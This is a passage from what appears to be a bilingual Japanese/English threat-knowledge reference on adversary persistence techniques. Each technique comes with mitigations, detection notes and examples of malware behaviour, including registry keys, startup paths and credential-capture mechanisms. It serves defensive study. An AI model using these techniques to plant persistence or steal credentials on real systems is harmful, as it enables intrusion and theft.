services. On macOS, launchd processes known as Launch Daemon and Launch Agent are run to finish system initialization and load user specific parameters. 敵対者は、Launch Agentを作成/変更してmacOSで永続化することがある。Adversaries may create or modify launch agents to repeatedly execute malicious payloads as part of persistence. When a user logs in, a per-user launchd process is started which loads the parameters for each launch-on-demand user agent from the property list (.plist) file found in <code>/System/Library/LaunchAgents</code>, <code>/Library/LaunchAgents</code>, and <code>~/Library/LaunchAgents</code>. Property list files use the <code>Label</code>, <code>ProgramArguments </code>, and <code>RunAtLoad</code> keys to identify the Launch Agent's name, executable location, and execution time. Launch Agents are often installed to perform updates to programs, launch user specified programs at login, or to conduct other developer tasks. 敵対者は、systemdサービスを作成/変更してLinuxで永続化することがある。Adversaries may create or modify systemd services to repeatedly execute malicious payloads as part of persistence. Systemd is a system and service manager commonly used for managing background daemon processes (also known as services) and other system resources. Systemd is the default initialization (init) system on many Linux distributions replacing legacy init systems, including SysVinit and Upstart, while remaining backwards compatible. 敵対者は、Windowsサービスを作成/変更して永続化することがある。Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions. Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry. 敵対者は、Launch Daemonを作成/変更してmacOSで永続化することがある。Adversaries may create or modify Launch Daemons to execute malicious payloads as part of persistence. Launch Daemons are plist files used to interact with Launchd, the service management framework used by macOS. Launch Daemons require elevated privileges to install, are executed for every user on a system prior to login, and run in the background without the need for user interaction. During the macOS initialization startup, the launchd process loads the parameters for launch-on-demand system-level daemons from plist files found in <code>/System/Library/LaunchDaemons/</code> and <code>/Library/LaunchDaemons/</code>. Required Launch Daemons parameters include a <code>Label</code> to identify the task, <code>Program</code> to provide a path to the executable, and <code>RunAtLoad</code> to specify when the task is run. Launch Daemons are often used to provide access to shared resources, updates to software, or conduct automation tasks. 敵対者は、コンテナサービスを作成/変更して永続化することがある。Adversaries may create or modify container or container cluster management tools that run as daemons, agents, or services on individual hosts. These include software for creating and managing individual containers, such as Docker and Podman, as well as container cluster node-level agents such as kubelet. By modifying these services, an adversary may be able to achieve persistence or escalate their privileges on a host. アカウントの作成・権限・ライフサイクルを適切に管理する。 ファイルやディレクトリの権限を最小化し、不正な改変を防ぐ。 特権アカウントの利用を最小化・監視し、悪用を防ぐ。 OSを安全に構成し、攻撃対象領域を縮小する。 ソフトウェアのインストールを制限し、不正なプログラム導入を防ぐ。 エンドポイントで悪意ある挙動を検出・防止する。 コード署名を検証し、未署名・不正なコードの実行を防ぐ。 システムやアカウントを監査し、不正な活動を検出する。 ソフトウェアを安全に構成し、悪用を防ぐ。 システムプロセスの作成/変更に関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 Exaramel for Linux has a hardcoded location that it uses to achieve persistence if the startup system is Upstart or System V and it is running as root. LITTLELAMB.WOOLTEA can initialize itself as a daemon to run persistently in the background. LunarMail can create an arbitrary process with a specified command line and redirect its output to a staging directory. IMAPLoader modifies Windows tasks on the victim machine to reference a retrieved PE file through a path modification. BOLDMOVE can free all resources and terminate itself on victim machines. Akira _v2 can create a child process for encryption. BRICKSTORM has created a new background session and has spawned a child process of a parent process when it determines it is not running in its intended state. 敵対者は、特定イベントを契機に悪意あるコードが実行されるよう設定して永続化することがある。 Adversaries may establish persistence and/or elevate privileges using system mechanisms that trigger execution based on specific events. Various operating systems have means to monitor and subscribe to events such as logons or other user activity such as running specific applications/binaries. Cloud environments may also support various functions and services that monitor and can be invoked in response to specific cloud events. 敵対者は、既定のファイル関連付けを変更してイベント契機でコードを実行することがある。Adversaries may establish persistence by executing malicious content triggered by a file type association. When a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access or by administrators using the built-in assoc utility. Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened. 敵対者は、スクリーンセーバーを悪用してコードを実行することがある。Adversaries may establish persistence by executing malicious content triggered by user inactivity. Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension. The Windows screensaver application scrnsave.scr is located in <code>C:\Windows\System32\</code>, and <code>C:\Windows\sysWOW64\</code> on 64-bit Windows systems, along with screensavers included with base Windows installations. 敵対者は、WMIイベントサブスクリプションを悪用してイベント契機で実行・永続化することがある。Adversaries may establish persistence and elevate privileges by executing malicious content triggered by a Windows Management Instrumentation (WMI) event subscription. WMI can be used to install event filters, providers, consumers, and bindings that execute code when a defined event occurs. Examples of events that may be subscribed to are the wall clock time, user login, or the computer's uptime. 敵対者は、Unixシェルの構成ファイルを改変してコードを実行することがある。Adversaries may establish persistence through executing malicious commands triggered by a user’s shell. User Unix Shells execute several configuration scripts at different points throughout the session based on events. For example, when a user opens a command-line interface or remotely logs in (such as via SSH) a login shell is initiated. The login shell executes scripts from the system (<code>/etc</code>) and the user’s home directory (<code>~/</code>) to configure the environment. All login shells on a system use /etc/profile when initiated. These configuration scripts run at the permission level of their directory and are often used to set environment variables, create aliases, and customize the user’s environment. When the shell exits or terminates, additional shell scripts are executed to ensure the shell exits appropriately. 敵対者は、シェルのtrapを悪用してシグナル契機でコードを実行することがある。Adversaries may establish persistence by executing malicious content triggered by an interrupt signal. The <code>trap</code> command allows programs and shells to specify commands that will be executed upon receiving interrupt signals. A common situation is a script allowing for graceful termination and handling of common keyboard interrupts like <code>ctrl+c</code> and <code>ctrl+d</code>. 敵対者は、LC_LOAD_DYLIBを追加してmach-oバイナリにコードをロードさせることがある。Adversaries may establish persistence by executing malicious content triggered by the execution of tainted binaries. Mach-O binaries have a series of headers that are used to perform certain operations when a binary is loaded. The LC_LOAD_DYLIB header in a Mach-O binary tells macOS and OS X which dynamic libraries (dylibs) to load during execution time. These can be added ad-hoc to the compiled binary as long as adjustments are made to the rest of the fields and dependencies. There are tools available to perform these changes. 敵対者は、NetshヘルパDLLを悪用して永続化することがある。Adversaries may establish persistence by executing malicious content triggered by Netsh Helper DLLs. Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system. It contains functionality to add helper DLLs for extending functionality of the utility. The paths to registered netsh.exe helper DLLs are entered into the Windows Registry at <code>HKLM\SOFTWARE\Microsoft\Netsh</code>. 敵対者は、アクセシビリティ機能(stickykeys等)を悪用してコードを実行することがある。Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by accessibility features. Windows contains accessibility features that may be launched with a key combination before a user has logged in (ex: when the user is on the Windows logon screen). An adversary can modify the way these programs are launched to get a command prompt or backdoor without logging in to the system. 敵対者は、AppCert DLLを悪用してコードを実行・永続化することがある。Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by AppCert DLLs loaded into processes. Dynamic-link libraries (DLLs) that are specified in the <code>AppCertDLLs</code> Registry key under <code>HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\</code> are loaded into every process that calls the ubiquitously used application programming interface (API) functions <code>CreateProcess</code>, <code>CreateProcessAsUser</code>, <code>CreateProcessWithLoginW</code>, <code>CreateProcessWithTokenW</code>, or <code>WinExec</code>. 敵対者は、AppInit DLLを悪用してコードを実行・永続化することがある。Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by AppInit DLLs loaded into processes. Dynamic-link libraries (DLLs) that are specified in the <code>AppInit_DLLs</code> value in the Registry keys <code>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows</code> or <code>HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Windows</code> are loaded by user32.dll into every process that loads user32.dll. In practice this is nearly every program, since user32.dll is a very common library. 敵対者は、アプリケーションシミング(shim)を悪用して永続化することがある。Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time. For example, the application shimming feature allows developers to apply fixes to applications (without rewriting code) that were created for Windows XP so that it will work with Windows 10. 敵対者は、IFEOインジェクションを悪用してデバッガ起動契機で実行することがある。Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by Image File Execution Options (IFEO) debuggers. IFEOs enable a developer to attach a debugger to an application. When a process is created, a debugger present in an application’s IFEO will be prepended to the application’s name, effectively launching the new process under the debugger (e.g., <code>C:\dbg\ntsd.exe -g notepad.exe</code>). 敵対者は、PowerShellプロファイルを改変してコードを実行・永続化することがある。Adversaries may gain persistence and elevate privileges by executing malicious content triggered by PowerShell profiles. A PowerShell profile (<code>profile.ps1</code>) is a script that runs when PowerShell starts and can be used as a logon script to customize user environments. 敵対者は、Emondを悪用してイベント契機でコードを実行することがある。Adversaries may gain persistence and elevate privileges by executing malicious content triggered by the Event Monitor Daemon (emond). Emond is a Launch Daemon that accepts events from various services, runs them through a simple rules engine, and takes action. The emond binary at <code>/sbin/emond</code> will load any rules from the <code>/etc/emond.d/rules/</code> directory and take action once an explicitly defined event takes place. 敵対者は、COMハイジャックを悪用してコードを実行・永続化することがある。Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects. COM is a system within Windows to enable interaction between software components through the operating system. References to various COM objects are stored in the Registry. 敵対者は、インストーラパッケージを悪用してコードを実行・永続化することがある。Adversaries may establish persistence and elevate privileges by using an installer to trigger the execution of malicious content. Installer packages are OS specific and contain the resources an operating system needs to install applications on a system. Installer packages can include scripts that run prior to installation as well as after installation is complete. Installer scripts may inherit elevated permissions when executed. Developers often use these scripts to prepare the environment for installation, check requirements, download dependencies, and remove files after installation. 敵対者は、udevルールを悪用してデバイスイベント契機で実行することがある。Adversaries may maintain persistence through executing malicious content triggered using udev rules. Udev is the Linux kernel device manager that dynamically manages device nodes, handles access to pseudo-device files in the `/dev` directory, and responds to hardware events, such as when external devices like hard drives or keyboards are plugged in or removed. Udev uses rule files with `match keys` to specify the conditions a hardware event must meet and `action keys` to define the actions that should follow. Root permissions are required to create, modify, or delete rule files located in `/etc/udev/rules.d/`, `/run/udev/rules.d/`, `/usr/lib/udev/rules.d/`, `/usr/local/lib/udev/rules.d/`, and `/lib/udev/rules.d/`. Rule priority is determined by both directory and by the digit prefix in the rule filename. 敵対者は、Python起動フックを悪用してコードを実行することがある。Adversaries may achieve persistence by leveraging Python’s startup mechanisms, including path configuration (`.pth`) files and the `sitecustomize.py` or `usercustomize.py` modules. These files are automatically processed during the initialization of the Python interpreter, allowing for the execution of arbitrary code whenever Python is invoked. 特権アカウントの利用を最小化・監視し、悪用を防ぐ。 ソフトウェアを最新に保ち、既知の脆弱性を修正する。 イベントトリガー実行に関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 KV Botnet Activity involves managing events on victim systems via <code>libevent</code> to execute a callback function when any running process contains the following references in their path without also having a reference to <code>bioset</code>: busybox, wget, curl, tftp, telnetd, or lua. If the <code>bioset</code> string is not found, the related process is terminated. XCSSET's `dfhsebxzod` module searches for `.xcodeproj` directories within the user’s home folder and subdirectories. For each match, it locates the corresponding `project.pbxproj` file and embeds an encoded payload into a build rule, target configuration, or project setting. The payload is later executed during the build process. Pacu can set up S3 bucket notifications to trigger a malicious Lambda function when a CloudFormation template is uploaded to the bucket. It can also create Lambda functions that trigger upon the creation of users, roles, and groups. UPSTYLE creates a `.pth` file beginning with the text `import` so that any time another process or script attempts to reference the modified item the malicious code will also run. 敵対者は、起動/ログオン時の自動実行機構を悪用して永続化することがある。 Adversaries may configure system settings to automatically execute a program during system boot or logon to maintain persistence or gain higher-level privileges on compromised systems. Operating systems may have mechanisms for automatically running a program on system boot or account logon. These mechanisms may include automatically executing programs that are placed in specially designated directories or are referenced by repositories that store configuration information, such as the Windows Registry. An adversary may achieve the same goal by modifying or extending features of the kernel. 敵対者は、レジストリRunキーやスタートアップフォルダを悪用して永続化することがある。Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level. 敵対者は、認証パッケージを悪用してコードを実行・永続化することがある。Adversaries may abuse authentication packages to execute DLLs when the system boots. Windows authentication package DLLs are loaded by the Local Security Authority (LSA) process at system start. They provide support for multiple logon processes and multiple security protocols to the operating system. 敵対者は、タイムプロバイダを悪用してコードを実行・永続化することがある。Adversaries may abuse time providers to execute DLLs when the system boots. The Windows Time service (W32Time) enables time synchronization across and within domains. W32Time time providers are responsible for retrieving time stamps from hardware/network resources and outputting these values to other network clients. 敵対者は、WinlogonヘルパDLLを悪用して永続化することがある。Adversaries may abuse features of Winlogon to execute DLLs and/or executables when a user logs in. Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete. Registry entries in <code>HKLM\Software[\\Wow6432Node\\]\Microsoft\Windows NT\CurrentVersion\Winlogon\</code> and <code>HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\</code> are used to manage additional helper programs and functionalities that support Winlogon. 敵対者は、セキュリティサポートプロバイダ(SSP)を悪用して永続化することがある。Adversaries may abuse security support providers (SSPs) to execute DLLs when the system boots. Windows SSP DLLs are loaded into the Local Security Authority (LSA) process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs. 敵対者は、カーネルモジュールや拡張を悪用して永続化することがある。Adversaries may modify the kernel to automatically execute programs on system boot. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system. 敵対者は、再オープンアプリケーション機能を悪用して永続化することがある。Adversaries may modify plist files to automatically run an application when a user logs in. When a user logs out or restarts via the macOS Graphical User Interface (GUI), a prompt is provided to the user with a checkbox to "Reopen windows when logging back in". When selected, all applications currently open are added to a property list file named <code>com.apple.loginwindow.[UUID].plist</code> within the <code>~/Library/Preferences/ByHost</code> directory. Applications listed in this file are automatically reopened upon the user’s next logon. 敵対者は、LSASSドライバを悪用してコードを実行・永続化することがある。Adversaries may modify or add LSASS drivers to obtain persistence on compromised systems. The Windows security subsystem is a set of components that manage and enforce the security policy for a computer or domain. The Local Security Authority (LSA) is the main component responsible for local security policy and user authentication. The LSA includes multiple dynamic link libraries (DLLs) associated with various other security functions, all of which run in the context of the LSA Subsystem Service (LSASS) lsass.exe process. 敵対者は、ショートカット(.lnk)を改変して永続化することがある。Adversaries may create or modify shortcuts that can execute a program during system boot or user login. Shortcuts or symbolic links are used to reference other files or programs that will be opened or executed when the shortcut is clicked or executed by a system startup process. 敵対者は、ポートモニタを悪用して永続化することがある。Adversaries may use port monitors to run an adversary supplied DLL during system boot for persistence or privilege escalation. A port monitor can be set through the <code>AddMonitor</code> API call to set a DLL to be loaded at startup. This DLL can be located in <code>C:\Windows\System32</code> and will be loaded and run by the print spooler service, `spoolsv.exe`, under SYSTEM level permissions on boot. 敵対者は、プリントプロセッサを悪用して永続化することがある。Adversaries may abuse print processors to run malicious DLLs during system boot for persistence and/or privilege escalation. Print processors are DLLs that are loaded by the print spooler service, `spoolsv.exe`, during boot. 敵対者は、XDG自動起動エントリを悪用してLinuxで永続化することがある。Adversaries may add or modify XDG Autostart Entries to execute malicious programs or commands when a user’s desktop environment is loaded at login. XDG Autostart entries are available for any XDG-compliant Linux system. XDG Autostart entries use Desktop Entry files (`.desktop`) to configure the user’s desktop environment upon user login. These configuration files determine what applications launch upon user login, define associated applications to open specific file types, and define applications used to open removable media. 敵対者は、Active Setupを悪用して永続化することがある。Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine. Active Setup is a Windows mechanism that is used to execute programs when a user logs in. The value stored in the Registry key will be executed after a user logs into the computer. These programs will be executed under the context of the user and will have the account's associated permissions level. 敵対者は、ログインアイテムを悪用してmacOSで永続化することがある。Adversaries may add login items to execute upon user login to gain persistence or escalate privileges. Login items are applications, documents, folders, or server connections that are automatically launched when a user logs in. Login items can be added via a shared file list or Service Management Framework. Shared file list login items can be set using scripting languages such as AppleScript, whereas the Service Management Framework uses the API call <code>SMLoginItemSetEnabled</code>. 起動/ログオン時の自動実行に関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 APT42 has modified the Registry to maintain persistence. Misdat has created registry keys for persistence, including `HKCU\Software\dnimtsoleht\StubPath`, `HKCU\Software\snimtsOleht\StubPath`, `HKCU\Software\Backtsaleht\StubPath`, `HKLM\SOFTWARE\Microsoft\Active Setup\Installed. Components\{3bf41072-b2b1-21c8-b5c1-bd56d32fbda7}`, and `HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\{3ef41072-a2f1-21c8-c5c1-70c2c3bc7905}`. Mis-Type has created registry keys for persistence, including `HKCU\Software\bkfouerioyou`, `HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\{6afa8072-b2b1-31a8-b5c1-{Unique Identifier}`, and `HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\{3BF41072-B2B1-31A8-B5C1-{Unique Identifier}`. Dtrack’s RAT makes a persistent target file with auto execution on the host start. BoxCaon established persistence by setting the <code>HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\load</code> registry key to point to its executable. xCaon has added persistence via the Registry key <code>HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\load</code> which causes the malware to run each time any user logs in. 敵対者は、正規のソフトウェアバイナリを改ざんして永続化することがある。 Adversaries may modify host software binaries to establish persistent access to systems. Software binaries/executables provide a wide range of system commands or services, programs, and libraries. Common software binaries are SSH clients, FTP clients, email clients, web browsers, and many other user or server applications. コード署名を検証し、未署名・不正なコードの実行を防ぐ。 ホストソフトウェアバイナリの侵害に関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 During the 2016 Ukraine Electric Power Attack, Sandworm Team used a trojanized version of Windows Notepad to add a layer of persistence for Industroyer. During Cutting Edge, threat actors trojanized legitimate files in Ivanti Connect Secure appliances with malicious code. During RedPenguin, UNC3886 peformed a local memory patching attack to modify the snmpd and mgd Junos OS daemons. APT5 has modified legitimate binaries and scripts for Pulse Secure VPNs including the legitimate DSUpgrade.pm file to install the ATRIUM webshell for persistence. UNC3886 has trojanized Fortinet firmware and replaced the legitimate `/usr/bin/tac_plus` TACACS+ daemon for Linux with a malicious version containing credential logging functionality. Ebury modifies the `keyutils` library to add malicious behavior to the OpenSSH client and the curl library. Bonadan has maliciously altered the OpenSSH binary on targeted systems to create a backdoor. Kessel has maliciously altered the OpenSSH binary on targeted systems to create a backdoor. ThiefQuest searches through the <code>/Users/</code> folder looking for executable files. For each executable, ThiefQuest prepends a copy of itself to the beginning of the file. When the file is executed, the ThiefQuest code is executed first. ThiefQuest creates a hidden file, copies the original target executable to the file, then executes the new hidden file to maintain the appearance of normal behavior. Industroyer has used a Trojanized version of the Windows Notepad application for an additional backdoor persistence mechanism. Kobalos replaced the SSH client with a trojanized SSH client to steal credentials on compromised systems. XCSSET uses a malicious browser application to replace the legitimate browser in order to continuously capture credentials, monitor web traffic, and download additional modules. SLOWPULSE is applied in compromised environments through modifications to legitimate Pulse Secure files. WIREFIRE can modify the `visits.py` component of Ivanti Connect Secure VPNs for file download and arbitrary command execution. WARPWIRE can embed itself into a legitimate file on compromised Ivanti Connect Secure VPNs. BUSHWALK can embed into the legitimate `querymanifest.cgi` file on compromised Ivanti Connect Secure VPNs. LIGHTWIRE can imbed itself into the legitimate `compcheckresult.cgi` component of Ivanti Connect Secure VPNs to enable command execution. FRAMESTING can embed itself in the CAV Python package of an Ivanti Connect Secure VPN located in `/home/venv3/lib/python3.6/site-packages/cav-0.1-py3.6.egg/cav/api/resources/category.py.` LITTLELAMB.WOOLTEA can append malicious components to the `tmp/tmpmnt/bin/samba_upgrade.tar` archive inside the factory reset partition in attempt to persist post reset. BFG Agonizer uses DLL unhooking to remove user mode inline hooks that security solutions often implement. BFG Agonizer also uses IAT unhooking to remove user-mode IAT hooks that security solutions also use. BOLDMOVE contains a watchdog-like feature that monitors a particular file for modification. If modification is detected, the legitimate file is backed up and replaced with a trojanized file to allow for persistence through likely system upgrades. GlassWorm can modify hardware wallet applications. PHASEJAM has modified legitimate components to enable persistence and execution, including inserting a web shell into `getComponent.cgi` and `restAuth.cgi`, modifying `DSUpgrade.pm` to block system upgrades, and overwriting `remotedebug` to execute arbitrary commands when specific parameters are provided. 敵対者は、認証メカニズムを改変して永続化や認証情報取得を行うことがある。 Adversaries may modify authentication mechanisms and processes to access user credentials or enable otherwise unwarranted access to accounts. The authentication process is handled by mechanisms, such as the Local Security Authentication Server (LSASS) process and the Security Accounts Manager (SAM) on Windows, pluggable authentication modules (PAM) on Unix-based systems, and authorization plugins on MacOS systems, responsible for gathering, storing, and validating credentials. By modifying an authentication process, an adversary may be able to authenticate to a service or system without using Valid Accounts. 敵対者は、ドメインコントローラの認証処理を改変して認証を回避/取得することがある。Adversaries may patch the authentication process on a domain controller to bypass the typical authentication mechanisms and enable access to accounts. 敵対者は、パスワードフィルタDLLを登録して平文パスワードを取得することがある。Adversaries may register malicious password filter dynamic link libraries (DLLs) into the authentication process to acquire user credentials as they are validated. 敵対者は、LinuxのPAMを改変して認証を回避/取得することがある。Adversaries may modify pluggable authentication modules (PAM) to access user credentials or enable otherwise unwarranted access to accounts. PAM is a modular system of configuration files, libraries, and executable files which guide authentication for many services. The most common authentication module is <code>pam_unix.so</code>, which retrieves, sets, and verifies account authentication information in <code>/etc/passwd</code> and <code>/etc/shadow</code>. 敵対者は、ネットワーク機器の認証処理を改変することがある。Adversaries may use Patch System Image to hard code a password in the operating system, thus bypassing of native authentication mechanisms for local accounts on network devices. 敵対者は、可逆暗号化を有効化してパスワード取得を容易にすることがある。An adversary may abuse Active Directory authentication encryption properties to gain access to credentials on Windows systems. The <code>AllowReversiblePasswordEncryption</code> property specifies whether reversible password encryption for an account is enabled or disabled. By default this property is disabled (instead storing user credentials as the output of one-way hashing functions) and should not be enabled unless legacy or other software require it. 敵対者は、MFA設定を改変して回避することがある。Adversaries may disable or modify multi-factor authentication (MFA) mechanisms to enable persistent access to compromised accounts. 敵対者は、ハイブリッドID基盤の認証処理を改変することがある。Adversaries may patch, modify, or otherwise backdoor cloud authentication processes that are tied to on-premises user identities in order to bypass typical authentication mechanisms, access credentials, and enable persistent access to accounts. 敵対者は、ネットワークプロバイダDLLを悪用して認証情報を取得することがある。Adversaries may register malicious network provider dynamic link libraries (DLLs) to capture cleartext user credentials during the authentication process. Network provider DLLs allow Windows to interface with specific network protocols and can also support add-on credential management functions. During the logon process, Winlogon (the interactive logon module) sends credentials to the local `mpnotify.exe` process via RPC. The `mpnotify.exe` process then shares the credentials in cleartext with registered credential managers when notifying that a logon event is happening. 敵対者は、条件付きアクセスポリシーを改変して認証制御を回避することがある。Adversaries may disable or modify conditional access policies to enable persistent access to compromised accounts. Conditional access policies are additional verifications used by identity providers and identity and access management systems to determine whether a user should be granted access to a resource. アカウントの作成・権限・ライフサイクルを適切に管理する。 ファイルやディレクトリの権限を最小化し、不正な改変を防ぐ。 レジストリキーの権限を制限し、不正な改変を防ぐ。 特権プロセスの完全性を保護し、不正なコード注入を防ぐ。 特権アカウントの利用を最小化・監視し、悪用を防ぐ。 強固なパスワードポリシーを適用し、推測・解読を困難にする。 OSを安全に構成し、攻撃対象領域を縮小する。 多要素認証を導入し、認証情報の窃取による不正アクセスを防ぐ。 システムやアカウントを監査し、不正な活動を検出する。 認証プロセスの変更に関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 ArcaneDoor included modification of the AAA process to bypass authentication mechanisms. FIN13 has replaced legitimate KeePass binaries with trojanized versions to collect passwords from numerous applications. Ebury can intercept private keys using a trojanized <code>ssh-add</code> function. Kessel has trojanized the <sode>ssh_login</code> and <code>user-auth_pubkey</code> functions to steal plaintext credentials. SILENTTRINITY can create a backdoor in KeePass using a malicious config file and in TortoiseSVN using a registry hook. DRYHOOK has intercepted and logged user credentials by modifying the Perl module in Ivanti Connect Secure VPN edge-devices located within `/home/perl/DSAuth.pm`. 敵対者は、電源設定を変更してシステムの可用性や永続化に影響を与えることがある。 Adversaries may impair a system's ability to hibernate, reboot, or shut down in order to extend access to infected machines. When a computer enters a dormant state, some or all software and hardware may cease to operate which can disrupt malicious activity. システムやアカウントを監査し、不正な活動を検出する。 電源設定に関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 ArcaneDoor involved exploitation of CVE-2024-20353 to force a victim Cisco ASA to reboot, triggering the automated unzipping and execution of the Line Runner implant. Line Dancer can modify the crash dump process on infected machines to skip crash dump generation and proceed directly to device reboot for both persistence and forensic evasion purposes. Line Runner used CVE-2024-20353 to trigger victim devices to reboot, in the process unzipping and installing the Line Dancer payload. 敵対者は、リソースを排他的に占有して他者のアクセスを排除し永続化することがある。 Adversaries who successfully compromise a system may attempt to maintain persistence by “closing the door” behind them – in other words, by preventing other threat actors from initially accessing or maintaining a foothold on the same system. 排他的制御に関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 敵対者は、悪意あるクラウドアプリ統合(OAuthアプリ等)を追加して永続化することがある。 Adversaries may achieve persistence by leveraging OAuth application integrations in a software-as-a-service environment. Adversaries may create a custom application, add a legitimate application into the environment, or even co-opt an existing integration to achieve malicious ends. 不要な機能やプログラムを無効化・削除し、攻撃対象領域を縮小する。 システムやアカウントを監査し、不正な活動を検出する。 クラウドアプリ統合に関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 During Salesforce Data Exfiltration, threat actors deceived victims into authorizing malicious connected apps to their organization's Salesforce portal. 敵対者は、起動/ログオン時に実行される初期化スクリプトを悪用して永続化することがある。 Adversaries may use scripts automatically executed at boot or logon initialization to establish persistence. Initialization scripts can be used to perform administrative functions, which may often execute other programs or send information to an internal logging server. These scripts can vary based on operating system and whether applied locally or remotely. 敵対者は、Windowsのログオンスクリプトを悪用して、ログオン時に悪意あるコードを実行し永続化することがある。Adversaries may use Windows logon scripts automatically executed at logon initialization to establish persistence. Windows allows logon scripts to be run whenever a specific user or group of users log into a system. This is done via adding a path to a script to the <code>HKCU\Environment\UserInitMprLogonScript</code> Registry key. 敵対者は、macOSのログインフックを悪用して永続化することがある。Adversaries may use a Login Hook to establish persistence executed upon user logon. A login hook is a plist file that points to a specific script to execute with root privileges upon user logon. The plist file is located in the <code>/Library/Preferences/com.apple.loginwindow.plist</code> file and can be modified using the <code>defaults</code> command-line utility. This behavior is the same for logout hooks where a script can be executed upon user logout. All hooks require administrator permissions to modify or create hooks. 敵対者は、ネットワークログオンスクリプトを悪用して永続化することがある。Adversaries may use network logon scripts automatically executed at logon initialization to establish persistence. Network logon scripts can be assigned using Active Directory or Group Policy Objects. These logon scripts run with the privileges of the user they are assigned to. Depending on the systems within the network, initializing one of these scripts could apply to more than one or potentially all systems. Adversaries may use these scripts to maintain persistence on a network. Depending on the access configuration of the logon scripts, either local credentials or an administrator account may be necessary. 敵対者は、RCスクリプト（rc.local等）を悪用して起動時に永続化することがある。Adversaries may establish persistence by modifying RC scripts, which are executed during a Unix-like system’s startup. These files allow system administrators to map and start custom services at startup for different run levels. RC scripts require root privileges to modify. 敵対者は、スタートアップアイテムを悪用して起動時に永続化することがある。Adversaries may use startup items automatically executed at boot initialization to establish persistence. Startup items execute during the final phase of the boot process and contain shell scripts or other executable files along with configuration information used by the system to determine the execution order for all startup items. ファイルやディレクトリの権限を最小化し、不正な改変を防ぐ。 レジストリキーの権限を制限し、不正な改変を防ぐ。 起動/ログオン初期化スクリプトに関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 ArcaneDoor used malicious boot scripts to install the Line Runner backdoor on victim devices. APT29 has hijacked legitimate application-specific startup scripts to enable malware to execute on system startup. APT41 used a hidden shell script in `/etc/rc.d/init.d` to leverage the `ADORE.XSEC`backdoor and `Adore-NG` rootkit. Rocke has installed an "init.d" startup script to maintain persistence. UNC3886 has attempted to bypass digital signature verification checks at startup by adding a command to the startup config `/etc/init.d/localnet` within the rootfs.gz archive of both FortiManager and FortiAnalyzer devices. Depending on the Linux distribution and when executing with root permissions, RotaJakiro may install persistence using a `.conf` file in the `/etc/init/` folder. VIRTUALPITA can persist as an init.d startup service on Linux vCenter systems. SPAWNCHIMERA has modified the boot process files within `/tmp/coreboot_fs/bin/init` to establish persistence. 敵対者は、タスクスケジューラ機能を悪用して、悪意あるコードを定期的または特定時刻に実行することがある。 Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system. 敵対者は、atコマンドを悪用してタスクをスケジュール実行することがある。Adversaries may abuse the at utility to perform task scheduling for initial or recurring execution of malicious code. The at utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of Scheduled Task's schtasks in 